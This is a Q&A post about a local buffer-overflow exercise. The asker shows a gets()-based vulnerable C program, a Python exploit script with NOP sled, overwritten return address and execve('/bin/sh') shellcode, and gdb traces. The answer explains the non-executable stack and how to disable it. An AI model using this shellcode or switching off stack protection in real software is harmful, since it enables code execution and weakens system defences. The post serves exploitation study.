# Segmentation Fault during Exploit

Tags: segmentation-fault, exploit, shellcode

I tried to execute a shellcode with buffer overflow. Unfortunately I get a segmentation error. In the following the c code asm code and exploit code:

C Code:

```
int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}
```

ASM Code:

```
   0x000055555555463a <+0>: push   rbp
   0x000055555555463b <+1>: mov    rbp,rsp
   0x000055555555463e <+4>: sub    rsp,0x50
   0x0000555555554642 <+8>: mov    DWORD PTR [rbp-0x44],edi
   0x0000555555554645 <+11>:    mov    QWORD PTR [rbp-0x50],rsi
   0x0000555555554649 <+15>:    lea    rax,[rbp-0x40]
   0x000055555555464d <+19>:    mov    rdi,rax
   0x0000555555554650 <+22>:    mov    eax,0x0
   0x0000555555554655 <+27>:    call   0x555555554510 <gets@plt>
   0x000055555555465a <+32>:    mov    eax,0x0
   0x000055555555465f <+37>:    leave  
=> 0x0000555555554660 <+38>:    ret
```

Exploit Code

```
import struct
sp = struct.pack("q", 0x007fffffffe1f0)
nops = "\x90"*20
Shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
print "A"*72 + sp + nops + Shellcode
```

After "ret" cmd, the rip looks at stack addr "0x007fffffffe1f0". In this address, there are NOPs Instruction. Now i expect that rip exec. the NOPs till reaching the shell code. But i get Segmentation Fault. In the following my Terminal Commands.

```
Starting program: /root/Desktop/ExerciseExploit/stack5 < ./text

Breakpoint 1, main (argc=1, argv=0x7fffffffe2c8) at stack5.c:11
11    gets(buffer);
(gdb) disas
Dump of assembler code for function main:
   0x000055555555463a <+0>: push   rbp
   0x000055555555463b <+1>: mov    rbp,rsp
   0x000055555555463e <+4>: sub    rsp,0x50
   0x0000555555554642 <+8>: mov    DWORD PTR [rbp-0x44],edi
   0x0000555555554645 <+11>:    mov    QWORD PTR [rbp-0x50],rsi
=> 0x0000555555554649 <+15>:    lea    rax,[rbp-0x40]
   0x000055555555464d <+19>:    mov    rdi,rax
   0x0000555555554650 <+22>:    mov    eax,0x0
   0x0000555555554655 <+27>:    call   0x555555554510 <gets@plt>
   0x000055555555465a <+32>:    mov    eax,0x0
   0x000055555555465f <+37>:    leave  
   0x0000555555554660 <+38>:    ret    
End of assembler dump.
(gdb) x/32x $rsp
0x7fffffffe190: 0xffffe2c8  0x00007fff  0xf7abe905  0x00000001
0x7fffffffe1a0: 0x00000001  0x00000000  0x555546bd  0x00005555
0x7fffffffe1b0: 0xf7de70e0  0x00007fff  0x00000000  0x00000000
0x7fffffffe1c0: 0x55554670  0x00005555  0x55554530  0x00005555
0x7fffffffe1d0: 0xffffe2c0  0x00007fff  0x00000000  0x00000000
0x7fffffffe1e0: 0x55554670  0x00005555  0xf7a3fa87  0x00007fff
0x7fffffffe1f0: 0x00000000  0x00000000  0xffffe2c8  0x00007fff
0x7fffffffe200: 0x00040000  0x00000001  0x5555463a  0x00005555
(gdb) i r rsp rbp rip
rsp            0x7fffffffe190   0x7fffffffe190
rbp            0x7fffffffe1e0   0x7fffffffe1e0
rip            0x555555554649   0x555555554649 <main+15>
(gdb) c
Continuing.

Breakpoint 2, 0x0000555555554660 in main (argc=1, argv=0x7fffffffe2c8) at stack5.c:12
12  }
(gdb) x/32x $rsp
0x7fffffffe1e8: 0xffffe1f0  0x00007fff  0x90909090  0x90909090
0x7fffffffe1f8: 0x90909090  0x90909090  0x90909090  0x6850c031
0x7fffffffe208: 0x68732f2f  0x69622f68  0x89e3896e  0xb0c289c1
0x7fffffffe218: 0x3180cd0b  0x80cd40c0  0x55554500  0x00005555
0x7fffffffe228: 0xffffe2c0  0x00007fff  0x00000000  0x00000000
0x7fffffffe238: 0x00000000  0x00000000  0x28cb0792  0xb3964c1b
0x7fffffffe248: 0x1f550792  0xb3965ca3  0x00000000  0x00000000
0x7fffffffe258: 0x00000000  0x00000000  0x00000000  0x00000000
(gdb) r < ./text
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/Desktop/ExerciseExploit/stack5 < ./text

Breakpoint 1, main (argc=1, argv=0x7fffffffe2c8) at stack5.c:11
11    gets(buffer);
(gdb) disas
Dump of assembler code for function main:
   0x000055555555463a <+0>: push   rbp
   0x000055555555463b <+1>: mov    rbp,rsp
   0x000055555555463e <+4>: sub    rsp,0x50
   0x0000555555554642 <+8>: mov    DWORD PTR [rbp-0x44],edi
   0x0000555555554645 <+11>:    mov    QWORD PTR [rbp-0x50],rsi
=> 0x0000555555554649 <+15>:    lea    rax,[rbp-0x40]
   0x000055555555464d <+19>:    mov    rdi,rax
   0x0000555555554650 <+22>:    mov    eax,0x0
   0x0000555555554655 <+27>:    call   0x555555554510 <gets@plt>
   0x000055555555465a <+32>:    mov    eax,0x0
   0x000055555555465f <+37>:    leave  
   0x0000555555554660 <+38>:    ret    
End of assembler dump.
(gdb) x/32x $rsp
0x7fffffffe190: 0xffffe2c8  0x00007fff  0xf7abe905  0x00000001
0x7fffffffe1a0: 0x00000001  0x00000000  0x555546bd  0x00005555
0x7fffffffe1b0: 0xf7de70e0  0x00007fff  0x00000000  0x00000000
0x7fffffffe1c0: 0x55554670  0x00005555  0x55554530  0x00005555
0x7fffffffe1d0: 0xffffe2c0  0x00007fff  0x00000000  0x00000000
0x7fffffffe1e0: 0x55554670  0x00005555  0xf7a3fa87  0x00007fff
0x7fffffffe1f0: 0x00000000  0x00000000  0xffffe2c8  0x00007fff
0x7fffffffe200: 0x00040000  0x00000001  0x5555463a  0x00005555
(gdb) i r rsp rbp rip
rsp            0x7fffffffe190   0x7fffffffe190
rbp            0x7fffffffe1e0   0x7fffffffe1e0
rip            0x555555554649   0x555555554649 <main+15>
(gdb) c
Continuing.

Breakpoint 2, 0x0000555555554660 in main (argc=1, argv=0x7fffffffe2c8) at stack5.c:12
12  }
(gdb) disas
Dump of assembler code for function main:
   0x000055555555463a <+0>: push   rbp
   0x000055555555463b <+1>: mov    rbp,rsp
   0x000055555555463e <+4>: sub    rsp,0x50
   0x0000555555554642 <+8>: mov    DWORD PTR [rbp-0x44],edi
   0x0000555555554645 <+11>:    mov    QWORD PTR [rbp-0x50],rsi
   0x0000555555554649 <+15>:    lea    rax,[rbp-0x40]
   0x000055555555464d <+19>:    mov    rdi,rax
   0x0000555555554650 <+22>:    mov    eax,0x0
   0x0000555555554655 <+27>:    call   0x555555554510 <gets@plt>
   0x000055555555465a <+32>:    mov    eax,0x0
   0x000055555555465f <+37>:    leave  
=> 0x0000555555554660 <+38>:    ret    
End of assembler dump.
(gdb) x/32x $rsp
0x7fffffffe1e8: 0xffffe1f0  0x00007fff  0x90909090  0x90909090
0x7fffffffe1f8: 0x90909090  0x90909090  0x90909090  0x6850c031
0x7fffffffe208: 0x68732f2f  0x69622f68  0x89e3896e  0xb0c289c1
0x7fffffffe218: 0x3180cd0b  0x80cd40c0  0x55554500  0x00005555
0x7fffffffe228: 0xffffe2c0  0x00007fff  0x00000000  0x00000000
0x7fffffffe238: 0x00000000  0x00000000  0xce4eb570  0x5565c335
0x7fffffffe248: 0xf9d0b570  0x5565d38d  0x00000000  0x00000000
0x7fffffffe258: 0x00000000  0x00000000  0x00000000  0x00000000
(gdb) i r rsp rbp rip
rsp            0x7fffffffe1e8   0x7fffffffe1e8
rbp            0x4141414141414141   0x4141414141414141
rip            0x555555554660   0x555555554660 <main+38>
(gdb) si
0x00007fffffffe1f0 in ?? ()
(gdb) x/32x $rsp
0x7fffffffe1f0: **0x90909090**  0x90909090  0x90909090  0x90909090
0x7fffffffe200: 0x90909090  0x6850c031  0x68732f2f  0x69622f68
0x7fffffffe210: 0x89e3896e  0xb0c289c1  0x3180cd0b  0x80cd40c0
0x7fffffffe220: 0x55554500  0x00005555  0xffffe2c0  0x00007fff
0x7fffffffe230: 0x00000000  0x00000000  0x00000000  0x00000000
0x7fffffffe240: 0xce4eb570  0x5565c335  0xf9d0b570  0x5565d38d
0x7fffffffe250: 0x00000000  0x00000000  0x00000000  0x00000000
0x7fffffffe260: 0x00000000  0x00000000  0xffffe2d8  0x00007fff
(gdb) i r rsp rbp rip
rsp            0x7fffffffe1f0   0x7fffffffe1f0
rbp            0x4141414141414141   0x4141414141414141
rip            **0x7fffffffe1f0**   0x7fffffffe1f0
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffe1f0 in ?? ()
```

Hints:
I am using Kali Linux

Can anybody tell me what i am doing wrong?
Thank you all!

Answer (score 0, accepted):

> what i am doing wrong?

All modern Linux distributions prevent execution of code from the stack by default (precisely to prevent this kind of overflow turning into an attack).

You can verify that is what's happening by looking at protection bits in `/proc/$pid/maps` (stack should have `rw` permissions, but no `x`).

You can disable this prevention with `gcc foo.c -Wl,-z,execstack`, or by using [execstack](http://man7.org/linux/man-pages/man8/execstack.8.html) utility.